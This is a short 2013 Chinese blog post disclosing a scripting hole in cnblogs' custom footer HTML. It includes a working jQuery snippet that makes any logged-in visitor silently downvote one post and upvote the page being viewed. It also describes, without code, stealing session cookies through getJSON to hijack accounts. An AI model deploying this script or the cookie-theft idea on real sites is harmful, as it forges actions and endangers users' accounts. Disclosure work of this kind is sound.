由《探讨下博客园的“反对”按钮》,发现的关于博客园xss漏洞

 
 
behaviour: 没一个已登陆用户访问我的博客,就会将你的原文,自动点击“反对”按钮按钮,投反对票。
 
代码:
 
 
 
 
  <!--PageEndHtml Block Begin-->
<script type="text/javascript">
  $(function(){
  $.ajax({type:'post',url:'http://www.cnblogs.com/mvc/vote/VotePost.aspx',data:'{"postId":2863624,"voteType":"Bury","isAbandoned":false}',success:function(msg){/*console.log(msg);*/}});
  if (typeof cb_entryId!='undefined'){
  $.ajax({type:'post',url:'http://www.cnblogs.com/mvc/vote/VotePost.aspx',data:'{"postId":'+cb_entryId+',"voteType":"Digg","isAbandoned":false}',success:function(msg){/*console.log(msg);*/}});
  }
  })
  </script>
 

<!--PageEndHtml Block End-->

 
 
最糟糕的应用场景,就是将已登录用户的cookies,等记录session的信息,偷偷通过  getJSON 方式,提交给三方网站,
同时,利用chrome替换为用户登录态的cookies,做坏事!(场景应用前提:登陆session id cookies 跟 ip 不绑定。)
 
希望博客园能够禁用javascript..
 
 

posted on 2013-01-17 09:16  gongji  阅读(307)  评论(0编辑  收藏  举报

导航